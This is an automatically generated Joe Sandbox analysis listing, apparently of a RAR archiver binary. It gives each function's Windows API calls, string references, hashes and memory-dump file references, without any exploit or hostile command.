Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$SleepTime
String ID: %12s %s$%12s %s$ $%s
API String ID: 2965465231-221484280
Opcode ID: bc1c7553d5c44cd859e352ff8c1349b34ba544aa6d31214373a77d6043f05ddf
Instruction ID: 2918bda4c99430a92399e168f6d8db8127033cd2fee6bf49bea29998c4ca2deb
Opcode Fuzzy Hash: bc1c7553d5c44cd859e352ff8c1349b34ba544aa6d31214373a77d6043f05ddf
Instruction Fuzzy Hash: 53F18A22B09AC286EA60EF12D4402EDA7E1FB45BA4FC44436DA4E47786DF3CE565D730

Function 00007FF7CF8E4C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7CF8E4C89
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7CF8E4CA1
RtlVirtualUnwind.KERNEL32 ref: 00007FF7CF8E4CDC
IsDebuggerPresent.KERNEL32 ref: 00007FF7CF8E4D15
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7CF8E4D1F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7CF8E4D2A

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction ID: 5beb902a8fb87808a4877dc84cab44f1426352b4ffe176eb6771803d092a1640
Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction Fuzzy Hash: A8314236618BC18ADB60DF25E8402EDB3A4FB89764F900136EA9D43B59DF3CD155CB20

Function 00007FF7CF89EF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF73
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF84
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7CF89EFA7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7CF89EFCA
GetLastError.KERNEL32 ref: 00007FF7CF89EFD4
CloseHandle.KERNEL32 ref: 00007FF7CF89EFE7

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction ID: 4adc6c086d054ba8f20651c47acb397e9575fc8f64a3d80ab84800cafd9dd8dd
Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction Fuzzy Hash: 0C114531A187818AEB509F61F8405AAF7E4FB88B90F944536EA8E43658DF3CE115DB70

Function 00007FF7CF8842E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8872C4: new.LIBCMT ref: 00007FF7CF8873DE

Part of subcall function 00007FF7CF888010: SetLastError.KERNEL32 ref: 00007FF7CF88803D

new.LIBCMT ref: 00007FF7CF88448C
new.LIBCMT ref: 00007FF7CF8844C5
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF884573
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF884584

Part of subcall function 00007FF7CF89CA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF89CEDE

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
String ID:
API String ID: 3116915952-0
Opcode ID: 71f1bbfe8e745b8f4eb9635b878db5a0e4a1844d939d302f67a965224fd40fd9
Instruction ID: ffdd23406dd52354bb98c045406eef855bc28592ff8249d878d9e1cd4d9a6ff4
Opcode Fuzzy Hash: 71f1bbfe8e745b8f4eb9635b878db5a0e4a1844d939d302f67a965224fd40fd9
Instruction Fuzzy Hash: 24E16022A08AC685EA20FF25E8505FDA3E1FB857A4F844032DA4D4779ADE3CE525D730

Function 00007FF7CF8A3A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,00007FF7CF8A11B0,?,?,?,00000000,?,?,00007FF7CF89F30F,00000000,00007FF7CF886380,?,00007FF7CF882EC8), ref: 00007FF7CF8A3AC4
CreateFileW.KERNEL32(?,?,?,00007FF7CF8A11B0,?,?,?,00000000,?,?,00007FF7CF89F30F,00000000,00007FF7CF886380,?,00007FF7CF882EC8), ref: 00007FF7CF8A3B0A
DeviceIoControl.KERNEL32 ref: 00007FF7CF8A3B55
CloseHandle.KERNEL32(?,?,?,00007FF7CF8A11B0,?,?,?,00000000,?,?,00007FF7CF89F30F,00000000,00007FF7CF886380,?,00007FF7CF882EC8), ref: 00007FF7CF8A3B60

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CreateFile$CloseControlDeviceHandle
String ID:
API String ID: 998109204-0
Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
Instruction ID: 0ad599c086cc3ce9ad33cad8f40918fac15dab964ee13b7b910e5f4a82a3e3d2
Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
Instruction Fuzzy Hash: CC31A132618BC186EB609F51B4406DAB7A4FB887F0F500235EEA903BD8CF3CD5659B10

Function 00007FF7CF888884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF7CF888D2A

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: 13be29d8e39cae67aab45b2dc07b05ea796754ef1fa03a0aad6a885bf0702d2f
Instruction ID: 304548f4ae8c27fc0dc0f934cd2504426cb859e7ce5479128102651b13ca1d80
Opcode Fuzzy Hash: 13be29d8e39cae67aab45b2dc07b05ea796754ef1fa03a0aad6a885bf0702d2f
Instruction Fuzzy Hash: A2D1BE62A19AD285EA20FF21D8501FDA3E1FF85BA0FC44532DA9E47695DF2CE511E330

Function 00007FF7CF8E86D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E8704

Part of subcall function 00007FF7CF8E4E3C: GetCurrentProcess.KERNEL32(00007FF7CF8E9CC5), ref: 00007FF7CF8E4E69

Strings

., xrefs: 00007FF7CF8E8B24
*?, xrefs: 00007FF7CF8E872B

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
Instruction ID: 37425b70fa0180ede14e216e9a0f0d9fb9330d588a0728db647eba0af9a81d36
Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
Instruction Fuzzy Hash: EA51DF6AB14AD685EB10EFA298002FCA7E4BB48BE8BD44531DE5D17B85DF3CD0619320

Function 00007FF7CF8CB340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF7CF8CB39A
CheckTokenMembership.ADVAPI32 ref: 00007FF7CF8CB3B1
FreeSid.ADVAPI32 ref: 00007FF7CF8CB3C2

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
Instruction ID: ce034d28baf75e07cfdbc3ec73dbd3ac7a433fb0d244d5d07b54119dbd4f6d27
Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
Instruction Fuzzy Hash: A7114972B146418EEB109FB5E4812EEB7B0FB48758F90153ADA8D93A58CF3CC154CB24

Function 00007FF7CF89CAFC Relevance: 3.0, APIs: 2, Instructions: 27windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7CF89CDE2), ref: 00007FF7CF89CB11
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,00007FF7CF89CDE2), ref: 00007FF7CF89CB3B

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
Instruction ID: 1c0b108cd804b23e312c4e7be82c055210b91c5e86184e2afed346bbb82ce300
Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
Instruction Fuzzy Hash: B7F08931B0C79287E3109F56B44015AF7D4FB95BD4F548134EA8953B58CF7CD5619710

Function 00007FF7CF8A3144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32(00007FF7CF8A2684), ref: 00007FF7CF8A319F

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
Instruction ID: 7e47676b00ff0fd62a868612636cf23bd8da72d046dcd24f6b520c27c65ec6e3
Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
Instruction Fuzzy Hash: BC012D32A286C186EB70EF55E4413EAB3A0FB84754F900132F78C82549DE2DD654DB60

Function 00007FF7CF8E6130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E62AD

Strings

NAN, xrefs: 00007FF7CF8E6191
nan(snan), xrefs: 00007FF7CF8E61D0
nan, xrefs: 00007FF7CF8E6198
NAN(SNAN), xrefs: 00007FF7CF8E61C5
NAN(IND), xrefs: 00007FF7CF8E61DB
nan(ind), xrefs: 00007FF7CF8E61E6
inf, xrefs: 00007FF7CF8E61B6
INF, xrefs: 00007FF7CF8E61A3

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
Instruction ID: f32c083fadc5ef709524b41d62926cccd843c2f17b421154c824a13239c80a74
Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
Instruction Fuzzy Hash: C441CC36B09B8589EB00DF64E8417E977E4EB183A8F80413AEE5C03B59DE3CD425C364

Function 00007FF7CF897988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(00000000,00000100,?,?,00000002,00007FF7CF897892), ref: 00007FF7CF8979BC
GetStdHandle.KERNEL32 ref: 00007FF7CF8979CA
GetConsoleMode.KERNEL32 ref: 00007FF7CF8979E0
GetConsoleMode.KERNEL32 ref: 00007FF7CF8979EE
SetConsoleMode.KERNEL32 ref: 00007FF7CF8979FC
SetConsoleMode.KERNEL32 ref: 00007FF7CF897A0A
ReadConsoleW.KERNEL32 ref: 00007FF7CF897A24
SetConsoleMode.KERNEL32 ref: 00007FF7CF897A3A
SetConsoleMode.KERNEL32 ref: 00007FF7CF897A47

Part of subcall function 00007FF7CF8982E4: fflush.LIBCMT ref: 00007FF7CF89832F

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Console$Mode$Handle$Readfflush
String ID:
API String ID: 1039280553-0
Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction ID: 18f44756b85cd652584daf436e690086929068da93b6155d61df9a849a9c4fee
Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction Fuzzy Hash: 24219835B186828BEB00AF25E8041BDA3A1FB99BB0F940130EE4A07764DE3CE556D730

Function 00007FF7CF8D0140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8D0211
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8D0222
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8D022D
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8D023E
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8D03D3
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8D03E4
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8D03EF
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8D0400

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

